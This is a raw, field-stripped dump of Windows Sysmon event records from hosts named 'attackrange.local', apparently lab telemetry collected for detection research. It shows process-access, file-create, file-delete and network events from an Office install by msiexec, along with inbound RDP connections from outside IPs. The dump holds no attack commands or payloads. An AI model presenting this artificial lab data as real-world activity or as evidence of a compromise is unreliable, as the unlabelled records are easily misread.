10341000x800000000000000074501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000074497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:26.514{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\SysWOW64\vcruntime140.dll2021-04-20 14:57:26.514 11241100x800000000000000074496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:26.499{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\SysWOW64\vccorlib140.dll2021-04-20 14:57:26.499 11241100x800000000000000074495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:26.483{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll2021-04-20 14:57:26.483 11241100x800000000000000074494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:26.436{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pidgenx.dll2021-04-20 14:57:26.436 254200x800000000000000074493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:57:26.436{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE2002-02-01 18:02:02.0002021-04-20 14:57:26.389 11241100x800000000000000074492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:57:26.405{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE2021-04-20 14:57:26.389 11241100x800000000000000074491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.389{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Microsoft Office\Office16\OSPP.VBS2021-04-20 14:57:26.389 11241100x800000000000000074490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:26.374{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\SysWOW64\msvcp140_1.dll2021-04-20 14:57:26.374 11241100x800000000000000074489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:26.374{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\SysWOW64\msvcp140.dll2021-04-20 14:57:26.374 254200x800000000000000074488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:57:26.374{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE2002-02-01 18:02:02.0002021-04-20 14:57:26.358 11241100x800000000000000074487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:57:26.358{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE2021-04-20 14:57:26.358 11241100x800000000000000074486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:26.358{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\SysWOW64\concrt140.dll2021-04-20 14:57:26.358 23542300x800000000000000074485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.343{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d08294.rbsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.327{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF5CC603816B875718.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.327{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF00B6ACC9153219E8.TMPMD5=2744EFA9A9181312E199B2CFD968E808,SHA256=C5331079FFC27C30C3AC81928A316A209BBA6C3A882F70AB7B358C3C8109123C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.311{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSID746.tmpMD5=EE6243DF5EA48D929DA4790EFEEA45C9,SHA256=0503FCF7646DAAE6E5445D8C5F248384542D2EEAB4C7D8AD3CD5A47759759A48,IMPHASH=27304803DEB6EEDF56BA2A6E235C6126truetrue 23542300x800000000000000074481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.280{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSID6F6.tmpMD5=EE6243DF5EA48D929DA4790EFEEA45C9,SHA256=0503FCF7646DAAE6E5445D8C5F248384542D2EEAB4C7D8AD3CD5A47759759A48,IMPHASH=27304803DEB6EEDF56BA2A6E235C6126truetrue 10341000x800000000000000074480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.264{A7A01FEF-EBD6-607E-B60C-00000000BB01}49847148c:\Windows\System32\MsiExec.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\Windows\System32\MsiExec.exe+6bca|c:\Windows\System32\MsiExec.exe+7166|c:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.264{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EBD6-607E-B60C-00000000BB01}4984c:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.249{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.249{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.249{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.249{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.249{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD6-607E-B60C-00000000BB01}4984c:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.249{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14004444C:\Windows\system32\msiexec.exe{A7A01FEF-EBD6-607E-B60C-00000000BB01}4984c:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\Msi.dll+ba4f5|C:\Windows\system32\Msi.dll+16c3b4|C:\Windows\system32\Msi.dll+16ca2c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000074472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.250{A7A01FEF-EBD6-607E-B60C-00000000BB01}4984C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\Windows\System32\MsiExec.exe -Embedding 455D3E0E06E6E28B1CAD3D6DB0B4BC8A E Global\MSI0000C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 23542300x800000000000000074471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.233{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSID6F5.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.077{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14001980C:\Windows\system32\msiexec.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19dedd|C:\Windows\system32\Msi.dll+2ea6e|C:\Windows\system32\Msi.dll+474c5|C:\Windows\system32\Msi.dll+10a3b5|C:\Windows\system32\Msi.dll+1095d6|C:\Windows\system32\Msi.dll+f3bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050267Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:26.317{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5C1B76FC7230475EB32B5FC33042274,SHA256=BA1501291EF22940E4B4A78BDB55B759079D7D47DD26AA0B4A44558620B6CC39,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050266Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:24.193{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59517-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050265Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:26.020{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EC895F501467D891822B4C0FCBFFEA5,SHA256=22B246E09E282D323C1B8D9E6DAC0BBE06910D197FE273DB8CEA0D1A60708260,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.686{A7A01FEF-B626-607E-1400-00000000BB01}12763692C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000074552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:26.489{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-28464-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000074551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000074550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:27.624{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 